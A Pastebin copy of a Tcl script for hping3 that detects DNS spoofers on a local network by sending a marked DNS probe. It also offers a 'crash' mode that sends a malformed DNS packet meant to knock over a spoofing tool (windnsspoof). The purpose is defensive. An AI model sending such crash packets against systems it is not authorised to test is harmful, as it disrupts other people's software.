SHARE
TWEET

dns_despoof.tcl

a guest Jan 21st, 2012 285 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #
  2. # DNS Despoofer
  3. # Emanuele "crossbower" Acri - 2010
  4. #
  5. # Usage:
  6. # hping3 exec dns_despoof.tcl <server> <interface> (<action:search|crash>)
  7. #
  8.  
  9. #
  10. # Search spoofers
  11. #
  12. proc search_spoofers { server interface } {
  13.  
  14.     # prepare and send DNS probe
  15.     set probe {ip(daddr=192.168.0.1,ttl=64)+udp(dport=53,sport=44556)+data(str=\2f\69\01\00\00\01\00\00\00\00\00\00\06\67\6f\6f\67\6c\65\03\63\6f\6d\00\00\01\00\01\70\69\7a\7a\61)};
  16.  
  17.     set probe [hping setfield ip daddr $server $probe];
  18.  
  19.     # send probe
  20.     hping send $probe;
  21.  
  22.     # sniff loop
  23.     while { 1 } {
  24.  
  25.         # sniff a single packet
  26.             set p [lindex [hping recv $interface] 0];
  27.        
  28.         # is it the DNS response?
  29.         if { [hping getfield ip proto $p] != 17 || [hping getfield ip saddr $p] != $server || [hping getfield udp sport $p] != 53 || [hping getfield udp dport $p] != 44556 } { continue }
  30.        
  31.         # get data
  32.         set res_data [hping getfield data str $p];
  33.         set result [string match "*pizza*" $res_data];
  34.            
  35.         if { $result == 0 } {
  36.             puts "No spoofer detected...";
  37.         } else {
  38.             puts "SPOOFER DETECTED!";
  39.         }
  40.        
  41.         break;
  42.     }
  43. }
  44.  
  45. #
  46. # Crash spoofers
  47. #
  48. proc crash_spoofers { server interface } {
  49.  
  50.     # prepare and send DNS probe
  51.     set probe {ip(daddr=192.168.0.1,ttl=64)+udp(dport=53,sport=44556)+data(str=\2f\69\01\00\00\01\00\00\00\00\00\00\06\67\6f\6f\67\6c\65\03\63\6f\6d\01\00\01\00\01\70\69\7a\7a\61)};
  52.  
  53.     set probe [hping setfield ip daddr $server $probe];
  54.  
  55.     # send probe
  56.     hping send $probe;
  57.    
  58.     puts "Bullet fired... Try again to search for spoofers:\n1) No responses: the spoofer is probably crashed (windnsspoof).\n2) Responses: it's a well written spoofer (dnsspoof).";
  59. }
  60.  
  61. #
  62. # Usage
  63. #
  64. proc usage {} {
  65.     puts "DNS Despoofer - Emanuele \"Crossbower\" Acri - 2010\nUsage:\n  hping3 exec dns_despoof.tcl <server> <interface> (<action:search|crash>)";
  66.     exit 250;
  67. }
  68.  
  69. #
  70. # Main
  71. #
  72.  
  73. #get dns server
  74. set server [lindex $argv 0];
  75. set interface [lindex $argv 1];
  76. set action [lindex $argv 2];
  77.  
  78. # check args
  79. if { $server == "" || $interface == "" } { usage }
  80.  
  81. # simple trick to initialize libpcap
  82. set p [lindex [hping recv $interface 1] 0];
  83.  
  84. # check action
  85. if { $action == "" || $action == "search" } {
  86.     search_spoofers $server $interface;
  87. } elseif { $action == "crash" } {
  88.     crash_spoofers $server $interface;
  89. } else {
  90.     usage;
  91. }
  92.  
  93. exit 0;
RAW Paste Data
Top